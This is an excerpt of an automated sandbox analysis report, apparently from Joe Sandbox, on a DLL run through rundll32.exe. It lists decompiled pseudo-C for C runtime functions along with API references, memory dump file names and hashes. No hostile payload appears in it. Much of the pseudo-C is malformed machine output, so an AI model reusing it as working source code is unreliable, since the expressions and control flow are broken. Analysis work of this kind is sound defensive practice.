                          • Opcode ID: 4b4e070a4b30cda99fb3dc24f2d45a93fe48c4a995dadef060bf1a20821bd7b8
                          • Instruction ID: ebc0c4238855db4a30a4edf9e908227cd1dfd213298ef84b59b9eeeaa348b8e1
                          • Opcode Fuzzy Hash: 4b4e070a4b30cda99fb3dc24f2d45a93fe48c4a995dadef060bf1a20821bd7b8
                          • Instruction Fuzzy Hash: FA51AD20E0C64385FE68AB65E8422B926A0BF777C0F445035E94D876DFCF2EE995CB10
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          APIs
                          • GetEnvironmentStringsW.KERNELBASE(?,?,?,?,?,?,?,00007FF88C07D8CF), ref: 00007FF88C080A59
                          • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FF88C07D8CF), ref: 00007FF88C080ABB
                          • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FF88C07D8CF), ref: 00007FF88C080AF5
                          • FreeEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FF88C07D8CF), ref: 00007FF88C080B1F
                          Memory Dump Source
                          • Source File: 00000006.00000002.405784597.00007FF88C071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF88C070000, based on PE: true
                          • Associated: 00000006.00000002.405761108.00007FF88C070000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000006.00000002.405829932.00007FF88C093000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000006.00000002.405874359.00007FF88C0A8000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000006.00000002.405912361.00007FF88C0B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000006.00000002.405939935.00007FF88C0B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_7ff88c070000_rundll32.jbxd
                          Similarity
                          • API ID: ByteCharEnvironmentMultiStringsWide$Free
                          • String ID:
                          • API String ID: 1557788787-0
                          • Opcode ID: ef2e6b779f9dc2e69840adeab8782f97473b4efd568450990a456c347f97633f
                          • Instruction ID: f2fc2ac83be0fb9f6078adaba92fb868221eb327f7e01f7ff60d07e042cf903b
                          • Opcode Fuzzy Hash: ef2e6b779f9dc2e69840adeab8782f97473b4efd568450990a456c347f97633f
                          • Instruction Fuzzy Hash: A2213231F19B9581EE748F12F840129A6E4FB55FD8B189135DA9E63BA8DF3CE452C700
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          C-Code - Quality: 52%
                          			E00007FF87FF88C07D734(void* __ecx, intOrPtr* __rax, long long __rbx, void* __rcx, void* __r8, long long _a8, signed int _a16, signed int _a24, signed int _a32) {
                          				long long _v56;
                          				void* __rdi;
                          				void* __rsi;
                          				void* __rbp;
                          				void* _t27;
                          				intOrPtr _t36;
                          				intOrPtr* _t62;
                          				long long _t68;
                          				void* _t70;
                          				long long _t84;
                          				signed int _t85;
                          				intOrPtr* _t86;
                          				void* _t89;
                          
                          				_t70 = __rcx;
                          				_a8 = __rbx;
                          				_t2 = _t70 - 1; // -1
                          				r14d = __ecx;
                          				if (_t2 - 1 <= 0) goto 0x8c07d768;
                          				_t27 = E00007FF87FF88C07E6A0(__rax);
                          				 *__rax = 0x16;
                          				E00007FF87FF88C07E580(_t27);
                          				goto 0x8c07d897;
                          				E00007FF87FF88C0805F8();
                          				r8d = 0x104;
                          				GetModuleFileNameA(??, ??, ??);
                          				_t86 =  *0x8c0b4950; // 0x19e3d483370
                          				 *0x8c0b4960 = 0x8c0b43e0;
                          				if (_t86 == 0) goto 0x8c07d79f;
                          				if ( *_t86 != dil) goto 0x8c07d7a2;
                          				_t62 =  &_a32;
                          				_a24 = _t85;
                          				_v56 = _t62;
                          				r8d = 0;
                          				_a32 = _t85;
                          				E00007FF87FF88C07D514(0x8c0b43e0, 0x8c0b43e0, 0x8c0b43e0, _t85, 0x8c0b43e0, _t89, __r8,  &_a24);
                          				r8d = 1;
                          				E00007FF87FF88C07D6D0(_a24, _a32, __r8); // executed
                          				_t68 = _t62;
                          				if (_t62 != 0) goto 0x8c07d7f3;
                          				E00007FF87FF88C07E6A0(_t62);
                          				_t10 = _t68 + 0xc; // 0xc
                          				 *_t62 = _t10;
                          				goto 0x8c07d892;
                          				_v56 =  &_a32;
                          				E00007FF87FF88C07D514(_t68, 0x8c0b43e0, _t68, _t85, 0x8c0b43e0, _t89, _t62 + _a24 * 8,  &_a24);
                          				if (r14d != 1) goto 0x8c07d829;
                          				_t36 = _a24 - 1;
                          				 *0x8c0b4940 = _t68;
                          				 *0x8c0b493c = _t36;
                          				goto 0x8c07d7ec;
                          				_a16 = _t85;
                          				0x8c07fef4();
                          				if (_t36 == 0) goto 0x8c07d858;
                          				E00007FF87FF88C07E114( &_a32, _a16);
                          				_a16 = _t85;
                          				E00007FF87FF88C07E114( &_a32, _t68);
                          				goto 0x8c07d897;
                          				_t84 = _a16;
                          				if ( *_t84 == _t85) goto 0x8c07d873;
                          				if ( *((intOrPtr*)(_t84 + 8)) != _t85) goto 0x8c07d867;
                          				 *0x8c0b493c = 0;
                          				_a16 = _t85;
                          				 *0x8c0b4940 = _t84;
                          				E00007FF87FF88C07E114(_t84 + 8, _t85 + 1);
                          				_a16 = _t85;
                          				E00007FF87FF88C07E114(_t84 + 8, _t68);
                          				return _t36;
                          			}
















                          0x7ff88c07d734
                          0x7ff88c07d734
                          0x7ff88c07d747
                          0x7ff88c07d74a
                          0x7ff88c07d750
                          0x7ff88c07d752
                          0x7ff88c07d75c
                          0x7ff88c07d75e
                          0x7ff88c07d763
                          0x7ff88c07d768
                          0x7ff88c07d774
                          0x7ff88c07d77f
                          0x7ff88c07d785
                          0x7ff88c07d78e
                          0x7ff88c07d798
                          0x7ff88c07d79d
                          0x7ff88c07d7a2
                          0x7ff88c07d7a6
                          0x7ff88c07d7ae
                          0x7ff88c07d7b3
                          0x7ff88c07d7b6
                          0x7ff88c07d7bf
                          0x7ff88c07d7c8
                          0x7ff88c07d7d5
                          0x7ff88c07d7da
                          0x7ff88c07d7e0
                          0x7ff88c07d7e2
                          0x7ff88c07d7e7
                          0x7ff88c07d7ea
                          0x7ff88c07d7ee
                          0x7ff88c07d805
                          0x7ff88c07d80a
                          0x7ff88c07d813
                          0x7ff88c07d818
                          0x7ff88c07d81a
                          0x7ff88c07d821
                          0x7ff88c07d827
                          0x7ff88c07d82d
                          0x7ff88c07d834
                          0x7ff88c07d83d
                          0x7ff88c07d843
                          0x7ff88c07d84b
                          0x7ff88c07d84f
                          0x7ff88c07d856
                          0x7ff88c07d858
                          0x7ff88c07d865
                          0x7ff88c07d871
                          0x7ff88c07d873
                          0x7ff88c07d87b
                          0x7ff88c07d87f
                          0x7ff88c07d886
                          0x7ff88c07d88e
                          0x7ff88c07d892
                          0x7ff88c07d8a9

                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000006.00000002.405784597.00007FF88C071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF88C070000, based on PE: true
                          • Associated: 00000006.00000002.405761108.00007FF88C070000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000006.00000002.405829932.00007FF88C093000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000006.00000002.405874359.00007FF88C0A8000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000006.00000002.405912361.00007FF88C0B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000006.00000002.405939935.00007FF88C0B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_7ff88c070000_rundll32.jbxd
                          Similarity
                          • API ID: FileModuleName_invalid_parameter_noinfo
                          • String ID: C:\Windows\system32\rundll32.exe
                          • API String ID: 3307058713-1534550049
                          • Opcode ID: 608f3a59dde5b4256447cf5f0bb571404734e00e084907b6274e3e22c00ab3e2
                          • Instruction ID: 984c6c71b5a5e1382077036644576bf3a30590c0c01921f22234c157db7f73b2
                          • Opcode Fuzzy Hash: 608f3a59dde5b4256447cf5f0bb571404734e00e084907b6274e3e22c00ab3e2
                          • Instruction Fuzzy Hash: F841AE32A09B5A8AEF58DF26E8400B867A4FF56BD4F544031EA4D07B49EF3EE541C700
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          C-Code - Quality: 65%
                          			E00007FF87FF88C07B89C(void* __ecx) {
                          				void* __rbx;
                          				void* _t12;
                          				void* _t17;
                          				void* _t18;
                          				void* _t19;
                          				void* _t20;
                          
                          				_t2 =  ==  ? 1 :  *0x8c0b41f8 & 0x000000ff;
                          				 *0x8c0b41f8 =  ==  ? 1 :  *0x8c0b41f8 & 0x000000ff;
                          				E00007FF87FF88C07BDF4(1, _t12, _t17, _t18, _t19, _t20);
                          				if (E00007FF87FF88C07C7DC() != 0) goto 0x8c07b8cb;
                          				goto 0x8c07b8df; // executed
                          				E00007FF87FF88C07E090(_t17); // executed
                          				if (0 != 0) goto 0x8c07b8dd;
                          				E00007FF87FF88C07C838(0);
                          				goto 0x8c07b8c7;
                          				return 1;
                          			}









                          0x7ff88c07b8b0
                          0x7ff88c07b8b3
                          0x7ff88c07b8b9
                          0x7ff88c07b8c5
                          0x7ff88c07b8c9
                          0x7ff88c07b8cb
                          0x7ff88c07b8d2
                          0x7ff88c07b8d6
                          0x7ff88c07b8db
                          0x7ff88c07b8e4

                          APIs
                          • __isa_available_init.LIBCMT ref: 00007FF88C07B8B9
                          • __vcrt_initialize.LIBVCRUNTIME ref: 00007FF88C07B8BE
                            • Part of subcall function 00007FF88C07C7DC: __vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 00007FF88C07C7E0
                            • Part of subcall function 00007FF88C07C7DC: __vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 00007FF88C07C7E5
                            • Part of subcall function 00007FF88C07C7DC: __vcrt_initialize_locks.LIBVCRUNTIME ref: 00007FF88C07C7EA
                          • __vcrt_uninitialize.LIBVCRUNTIME ref: 00007FF88C07B8D6
                          Memory Dump Source
                          • Source File: 00000006.00000002.405784597.00007FF88C071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF88C070000, based on PE: true
                          • Associated: 00000006.00000002.405761108.00007FF88C070000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000006.00000002.405829932.00007FF88C093000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000006.00000002.405874359.00007FF88C0A8000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000006.00000002.405912361.00007FF88C0B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000006.00000002.405939935.00007FF88C0B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_7ff88c070000_rundll32.jbxd
                          Similarity
                          • API ID: __isa_available_init__vcrt_initialize__vcrt_initialize_locks__vcrt_initialize_pure_virtual_call_handler__vcrt_initialize_winapi_thunks__vcrt_uninitialize
                          • String ID:
                          • API String ID: 3388242289-0
                          • Opcode ID: 069ba207e829dfcd2a7a09410ea271609d7bb695ba881f2a8a90ee759a22d1bf
                          • Instruction ID: a41d61d37a51fe70c53bfa2300363880e6f17091077ea51712f1c68653b8dcab
                          • Opcode Fuzzy Hash: 069ba207e829dfcd2a7a09410ea271609d7bb695ba881f2a8a90ee759a22d1bf
                          • Instruction Fuzzy Hash: ACE01250E0D18345FD9C276190526B81B402F373C4F0414B5D86D861CBCF0F658AE631
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          C-Code - Quality: 71%
                          			E00007FF87FF88C083AC0(void* __ecx, void* __edx, long long __rax, signed int __rbx, void* __rcx, void* __rdx, long long __rdi, long long __rsi, void* __rbp, void* __r9, long long _a8, long long _a16, long long _a24) {
                          				long long _v24;
                          				void* _t18;
                          				intOrPtr _t21;
                          				intOrPtr _t23;
                          				intOrPtr _t24;
                          				void* _t32;
                          				long long _t39;
                          				signed long long _t45;
                          
                          				_t39 = __rax;
                          				_a8 = __rbx;
                          				_a16 = __rsi;
                          				_a24 = __rdi;
                          				_t32 = __ecx;
                          				if ((0 | __ecx - 0x00002000 > 0x00000000) != 0) goto 0x8c083afd;
                          				_t18 = E00007FF87FF88C07E6A0(__rax);
                          				 *((intOrPtr*)(__rax)) = 9;
                          				E00007FF87FF88C07E580(_t18);
                          				goto 0x8c083b61;
                          				E00007FF87FF88C07F2B0();
                          				_t45 = __rbx;
                          				_v24 = __rbx;
                          				_t21 =  *0x8c0b4d70; // 0x40
                          				if (_t32 - _t21 < 0) goto 0x8c083b55;
                          				if ( *((intOrPtr*)(0x8c0b4970 + __rbx * 8)) == __rbx) goto 0x8c083b29;
                          				goto 0x8c083b4b; // executed
                          				E00007FF87FF88C0839D8( *((intOrPtr*)(0x8c0b4970 + __rbx * 8)) - __rbx, __rax, __rbx, __rcx, __rdx, __rsi, __rbp, __r9); // executed
                          				 *((long long*)(0x8c0b4970 + _t45 * 8)) = _t39;
                          				if (_t39 != 0) goto 0x8c083b3c;
                          				goto 0x8c083b55;
                          				_t23 =  *0x8c0b4d70; // 0x40
                          				_t24 = _t23 + 0x40;
                          				 *0x8c0b4d70 = _t24;
                          				_v24 = _t45 + 1;
                          				goto 0x8c083b16;
                          				E00007FF87FF88C07F304();
                          				goto 0x8c083af9;
                          				return _t24;
                          			}











                          0x7ff88c083ac0
                          0x7ff88c083ac0
                          0x7ff88c083ac5
                          0x7ff88c083aca
                          0x7ff88c083ad5
                          0x7ff88c083ae6
                          0x7ff88c083ae8
                          0x7ff88c083af2
                          0x7ff88c083af4
                          0x7ff88c083afb
                          0x7ff88c083b02
                          0x7ff88c083b08
                          0x7ff88c083b0b
                          0x7ff88c083b10
                          0x7ff88c083b18
                          0x7ff88c083b25
                          0x7ff88c083b27
                          0x7ff88c083b29
                          0x7ff88c083b2e
                          0x7ff88c083b35
                          0x7ff88c083b3a
                          0x7ff88c083b3c
                          0x7ff88c083b42
                          0x7ff88c083b45
                          0x7ff88c083b4e
                          0x7ff88c083b53
                          0x7ff88c083b5a
                          0x7ff88c083b5f
                          0x7ff88c083b76

                          APIs
                          Memory Dump Source
                          • Source File: 00000006.00000002.405784597.00007FF88C071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF88C070000, based on PE: true
                          • Associated: 00000006.00000002.405761108.00007FF88C070000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000006.00000002.405829932.00007FF88C093000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000006.00000002.405874359.00007FF88C0A8000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000006.00000002.405912361.00007FF88C0B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000006.00000002.405939935.00007FF88C0B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_7ff88c070000_rundll32.jbxd
                          Similarity
                          • API ID: _invalid_parameter_noinfo
                          • String ID:
                          • API String ID: 3215553584-0
                          • Opcode ID: e1fbc31160e4b4ac265e7fa731fe9e1eab700c2b4d0d0f1e7a082a805eaa686e
                          • Instruction ID: 64220c5d8cb4d87c4a8b7a470d8eeddd0fa36d4eb45a53fd6408e3072a77103b
                          • Opcode Fuzzy Hash: e1fbc31160e4b4ac265e7fa731fe9e1eab700c2b4d0d0f1e7a082a805eaa686e
                          • Instruction Fuzzy Hash: 10115B72A1D68286FB209B62E88123976E4FB8A7C0F454435E78D4779ADF3CE901CB00
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          C-Code - Quality: 37%
                          			E00007FF87FF88C07E26C(void* __eax, signed int __rcx, signed int __rdx) {
                          				void* __rbx;
                          				intOrPtr* _t22;
                          				signed int _t29;
                          
                          				_t29 = __rdx;
                          				if (__rcx == 0) goto 0x8c07e28b;
                          				_t1 = _t29 - 0x20; // -32
                          				_t22 = _t1;
                          				if (_t22 - __rdx < 0) goto 0x8c07e2ce;
                          				_t25 =  ==  ? _t22 : __rcx * __rdx;
                          				goto 0x8c07e2b2;
                          				if (E00007FF87FF88C081374() == 0) goto 0x8c07e2ce;
                          				if (E00007FF87FF88C080F5C(_t22,  ==  ? _t22 : __rcx * __rdx,  ==  ? _t22 : __rcx * __rdx) == 0) goto 0x8c07e2ce;
                          				RtlAllocateHeap(??, ??, ??); // executed
                          				if (_t22 == 0) goto 0x8c07e29d;
                          				goto 0x8c07e2db;
                          				E00007FF87FF88C07E6A0(_t22);
                          				 *_t22 = 0xc;
                          				return 0;
                          			}






                          0x7ff88c07e26c
                          0x7ff88c07e27b
                          0x7ff88c07e27f
                          0x7ff88c07e27f
                          0x7ff88c07e289
                          0x7ff88c07e297
                          0x7ff88c07e29b
                          0x7ff88c07e2a4
                          0x7ff88c07e2b0
                          0x7ff88c07e2c1
                          0x7ff88c07e2ca
                          0x7ff88c07e2cc
                          0x7ff88c07e2ce
                          0x7ff88c07e2d3
                          0x7ff88c07e2e0

                          APIs
                          • RtlAllocateHeap.NTDLL(?,?,00000000,00007FF88C07F1A8,?,?,0000812541C23493,00007FF88C07E6A9,?,?,?,?,00007FF88C07E139,?,?,?), ref: 00007FF88C07E2C1
                          Memory Dump Source
                          • Source File: 00000006.00000002.405784597.00007FF88C071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF88C070000, based on PE: true
                          • Associated: 00000006.00000002.405761108.00007FF88C070000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000006.00000002.405829932.00007FF88C093000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000006.00000002.405874359.00007FF88C0A8000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000006.00000002.405912361.00007FF88C0B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000006.00000002.405939935.00007FF88C0B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_7ff88c070000_rundll32.jbxd
                          Similarity
                          • API ID: AllocateHeap
                          • String ID:
                          • API String ID: 1279760036-0
                          • Opcode ID: 38d319fa34a6f28828c9c4252ccc1e606beff5a42ae1a748ed59fc70cab1af25
                          • Instruction ID: 9ff59ae70b3340a9bb202d86cf04713f5274938c766684943e618b1851c99d1b
                          • Opcode Fuzzy Hash: 38d319fa34a6f28828c9c4252ccc1e606beff5a42ae1a748ed59fc70cab1af25
                          • Instruction Fuzzy Hash: 34F06264B0B20259FF6896A2D8143B512847FABBC0F185434CE1E966DEDF1DE482C120
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 65%
                          			E00007FF87FF88C07E374(void* __ecx, intOrPtr __edx, void* __esp, long long __rbx, void* __rdx, long long __rsi, void* __r8) {
                          				void* __rdi;
                          				void* _t36;
                          				int _t40;
                          				void* _t43;
                          				void* _t44;
                          				intOrPtr _t52;
                          				signed long long _t62;
                          				long long _t65;
                          				_Unknown_base(*)()* _t85;
                          				void* _t89;
                          				void* _t90;
                          				void* _t92;
                          				signed long long _t93;
                          				struct _EXCEPTION_POINTERS* _t99;
                          
                          				_t45 = __ecx;
                          				 *((long long*)(_t92 + 0x10)) = __rbx;
                          				 *((long long*)(_t92 + 0x18)) = __rsi;
                          				_t3 = _t92 - 0x4f0; // -1288
                          				_t90 = _t3;
                          				_t93 = _t92 - 0x5f0;
                          				_t62 =  *0x8c0b3760; // 0x812541c23493
                          				 *(_t90 + 0x4e0) = _t62 ^ _t93;
                          				_t52 = r8d;
                          				_t44 = __ecx;
                          				if (__ecx == 0xffffffff) goto 0x8c07e3b3;
                          				E00007FF87FF88C07BC04(_t36);
                          				_t5 = _t93 + 0x70; // 0x58
                          				r8d = 0x98;
                          				E00007FF87FF88C07C440(__ecx, 0, _t52, __esp, _t5, __rdx, _t85, __r8);
                          				_t6 = _t90 + 0x10; // -1272
                          				r8d = 0x4d0;
                          				E00007FF87FF88C07C440(_t45, 0, _t52, __esp, _t6, __rdx, _t85, __r8);
                          				_t7 = _t93 + 0x70; // 0x58
                          				 *((long long*)(_t93 + 0x48)) = _t7;
                          				_t10 = _t90 + 0x10; // -1272
                          				_t65 = _t10;
                          				 *((long long*)(_t93 + 0x50)) = _t65;
                          				__imp__RtlCaptureContext();
                          				r8d = 0;
                          				__imp__RtlLookupFunctionEntry();
                          				if (_t65 == 0) goto 0x8c07e446;
                          				 *(_t93 + 0x38) =  *(_t93 + 0x38) & 0x00000000;
                          				_t16 = _t93 + 0x60; // 0x48
                          				 *((long long*)(_t93 + 0x30)) = _t16;
                          				_t19 = _t93 + 0x58; // 0x40
                          				 *((long long*)(_t93 + 0x28)) = _t19;
                          				_t21 = _t90 + 0x10; // -1272
                          				 *((long long*)(_t93 + 0x20)) = _t21;
                          				__imp__RtlVirtualUnwind();
                          				 *((long long*)(_t90 + 0x108)) =  *((intOrPtr*)(_t90 + 0x508));
                          				_t25 = _t90 + 0x508; // 0x0
                          				 *((intOrPtr*)(_t93 + 0x70)) = __edx;
                          				 *((long long*)(_t90 + 0xa8)) = _t25 + 8;
                          				 *((long long*)(_t90 - 0x80)) =  *((intOrPtr*)(_t90 + 0x508));
                          				 *((intOrPtr*)(_t93 + 0x74)) = _t52;
                          				_t40 = IsDebuggerPresent();
                          				SetUnhandledExceptionFilter(_t85, _t89);
                          				if (UnhandledExceptionFilter(_t99) != 0) goto 0x8c07e4a8;
                          				if (_t40 != 0) goto 0x8c07e4a8;
                          				if (_t44 == 0xffffffff) goto 0x8c07e4a8;
                          				_t43 = E00007FF87FF88C07BC04(_t42);
                          				E00007FF87FF88C086D80();
                          				return _t43;
                          			}

















                          0x7ff88c07e374
                          0x7ff88c07e374
                          0x7ff88c07e379
                          0x7ff88c07e382
                          0x7ff88c07e382
                          0x7ff88c07e38a
                          0x7ff88c07e391
                          0x7ff88c07e39b
                          0x7ff88c07e3a2
                          0x7ff88c07e3a7
                          0x7ff88c07e3ac
                          0x7ff88c07e3ae
                          0x7ff88c07e3b5
                          0x7ff88c07e3ba
                          0x7ff88c07e3c0
                          0x7ff88c07e3c7
                          0x7ff88c07e3cb
                          0x7ff88c07e3d1
                          0x7ff88c07e3d6
                          0x7ff88c07e3db
                          0x7ff88c07e3e4
                          0x7ff88c07e3e4
                          0x7ff88c07e3e8
                          0x7ff88c07e3ed
                          0x7ff88c07e402
                          0x7ff88c07e405
                          0x7ff88c07e40e
                          0x7ff88c07e410
                          0x7ff88c07e416
                          0x7ff88c07e423
                          0x7ff88c07e42b
                          0x7ff88c07e430
                          0x7ff88c07e435
                          0x7ff88c07e439
                          0x7ff88c07e440
                          0x7ff88c07e44d
                          0x7ff88c07e454
                          0x7ff88c07e45f
                          0x7ff88c07e463
                          0x7ff88c07e471
                          0x7ff88c07e475
                          0x7ff88c07e479
                          0x7ff88c07e483
                          0x7ff88c07e496
                          0x7ff88c07e49a
                          0x7ff88c07e49f
                          0x7ff88c07e4a3
                          0x7ff88c07e4b2
                          0x7ff88c07e4ce

                          APIs
                          Memory Dump Source
                          • Source File: 00000006.00000002.405784597.00007FF88C071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF88C070000, based on PE: true
                          • Associated: 00000006.00000002.405761108.00007FF88C070000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000006.00000002.405829932.00007FF88C093000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000006.00000002.405874359.00007FF88C0A8000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000006.00000002.405912361.00007FF88C0B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000006.00000002.405939935.00007FF88C0B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_7ff88c070000_rundll32.jbxd
                          Similarity
                          • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                          • String ID:
                          • API String ID: 1239891234-0
                          • Opcode ID: 07dcb6749cf727804a818c63ef9eb218394f6ec07e419224f6cd5021fde535cb
                          • Instruction ID: 0c7b21463160054d03d981d111d5a7f7e7897e70b88482e26c61dd0242a9fa81
                          • Opcode Fuzzy Hash: 07dcb6749cf727804a818c63ef9eb218394f6ec07e419224f6cd5021fde535cb
                          • Instruction Fuzzy Hash: 44316036608B8186EB64CF25E8443AE73A4FB997D4F504136EA9D47BA8DF3CC555CB00
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 64%
                          			E00007FF87FF88C07F964(void* __edx, intOrPtr* __rax, long long __rbx, intOrPtr* __rcx, long long __rdx, long long _a8, void* _a16, long long _a24, intOrPtr _a26, long long _a32) {
                          				long long _v72;
                          				intOrPtr _v80;
                          				void* _v88;
                          				long long _v96;
                          				long long _v104;
                          				void* __rdi;
                          				void* __rsi;
                          				void* __rbp;
                          				void* _t33;
                          				void* _t37;
                          				intOrPtr* _t66;
                          				signed long long _t68;
                          				long long _t70;
                          				long long _t72;
                          				long long _t78;
                          				void* _t83;
                          				void* _t90;
                          				long long _t104;
                          				long long _t108;
                          				void* _t110;
                          				intOrPtr* _t112;
                          				void* _t114;
                          				void* _t117;
                          				intOrPtr _t129;
                          				void* _t131;
                          				void* _t132;
                          				signed long long _t133;
                          				signed long long _t134;
                          				signed long long _t137;
                          				intOrPtr* _t138;
                          
                          				_t66 = __rax;
                          				_a8 = __rbx;
                          				_a16 = __rdx;
                          				if (__rdx != 0) goto 0x8c07f9a0;
                          				_t33 = E00007FF87FF88C07E6A0(__rax);
                          				_t3 = _t108 + 0x16; // 0x16
                          				 *__rax = _t3;
                          				E00007FF87FF88C07E580(_t33);
                          				goto 0x8c07fb40;
                          				asm("xorps xmm0, xmm0");
                          				 *((long long*)(__rdx)) = _t108;
                          				asm("movdqu [ebp-0x20], xmm0");
                          				_v72 = _t108;
                          				if ( *__rcx == _t108) goto 0x8c07fa0b;
                          				_a24 = 0x3f2a;
                          				_a26 = dil;
                          				E00007FF87FF88C083218( *__rcx,  &_a24);
                          				if (_t66 != 0) goto 0x8c07f9e2;
                          				r8d = 0;
                          				_t37 = E00007FF87FF88C07FB70(__rcx,  *__rcx,  &_a24, _t108, _t110, _t114, _t117,  &_v88);
                          				goto 0x8c07f9ee;
                          				0x8c07fc80();
                          				r14d = _t37;
                          				if (_t37 != 0) goto 0x8c07f9fe;
                          				goto 0x8c07f9b2;
                          				goto 0x8c07fb04;
                          				_t112 = _v88;
                          				_t129 = _v80;
                          				_a24 = _t108;
                          				_t68 = _t129 - _t112;
                          				_t137 = (_t68 >> 3) + 1;
                          				_t90 =  >  ? _t108 : _t68 + 7 >> 3;
                          				_t134 = _t133 | 0xffffffff;
                          				if (_t90 == 0) goto 0x8c07fa6d;
                          				_t70 = _t134 + 1;
                          				if ( *((intOrPtr*)( *_t112 + _t70)) != dil) goto 0x8c07fa4e;
                          				if (_t108 + 1 != _t90) goto 0x8c07fa48;
                          				_a24 = _t108 + 1 + _t70;
                          				r8d = 1;
                          				E00007FF87FF88C07D6D0(_t137, _t108 + 1 + _t70, _t108 + 1);
                          				_t78 = _t70;
                          				if (_t70 == 0) goto 0x8c07fafd;
                          				_t104 = _t70 + _t137 * 8;
                          				_t138 = _t112;
                          				_v96 = _t104;
                          				_a32 = _t104;
                          				if (_t112 == _t129) goto 0x8c07faf3;
                          				_v104 = _t78 - _t112;
                          				_t131 = _t134 + 1;
                          				if ( *((intOrPtr*)( *_t138 + _t131)) != dil) goto 0x8c07faad;
                          				_t132 = _t131 + 1;
                          				if (E00007FF87FF88C083144(0, _t104, _t78, _t104, _t104 - _t104 + _a24, _t132) != 0) goto 0x8c07fb58;
                          				_t72 = _a32;
                          				 *((long long*)(_v104 + _t138)) = _t72;
                          				_a32 = _t72 + _t132;
                          				if (_t138 + 8 != _t129) goto 0x8c07faa7;
                          				r14d = 0;
                          				 *_a16 = _t78;
                          				E00007FF87FF88C07E114(_a16, _v104);
                          				_t83 =  >  ? _t108 : _t129 - _t112 + 7 >> 3;
                          				if (_t83 == 0) goto 0x8c07fb35;
                          				E00007FF87FF88C07E114(_a16,  *_t112);
                          				if (_t108 + 1 != _t83) goto 0x8c07fb21;
                          				E00007FF87FF88C07E114(_a16, _t112);
                          				return r14d;
                          			}

































                          0x7ff88c07f964
                          0x7ff88c07f964
                          0x7ff88c07f969
                          0x7ff88c07f988
                          0x7ff88c07f98a
                          0x7ff88c07f98f
                          0x7ff88c07f992
                          0x7ff88c07f994
                          0x7ff88c07f99b
                          0x7ff88c07f9a0
                          0x7ff88c07f9a3
                          0x7ff88c07f9a9
                          0x7ff88c07f9ae
                          0x7ff88c07f9b2
                          0x7ff88c07f9bb
                          0x7ff88c07f9c1
                          0x7ff88c07f9c5
                          0x7ff88c07f9d0
                          0x7ff88c07f9d6
                          0x7ff88c07f9db
                          0x7ff88c07f9e0
                          0x7ff88c07f9e9
                          0x7ff88c07f9ee
                          0x7ff88c07f9f3
                          0x7ff88c07f9fc
                          0x7ff88c07fa06
                          0x7ff88c07fa0b
                          0x7ff88c07fa12
                          0x7ff88c07fa1c
                          0x7ff88c07fa20
                          0x7ff88c07fa2d
                          0x7ff88c07fa3b
                          0x7ff88c07fa3f
                          0x7ff88c07fa46
                          0x7ff88c07fa4e
                          0x7ff88c07fa55
                          0x7ff88c07fa67
                          0x7ff88c07fa69
                          0x7ff88c07fa6d
                          0x7ff88c07fa79
                          0x7ff88c07fa7e
                          0x7ff88c07fa84
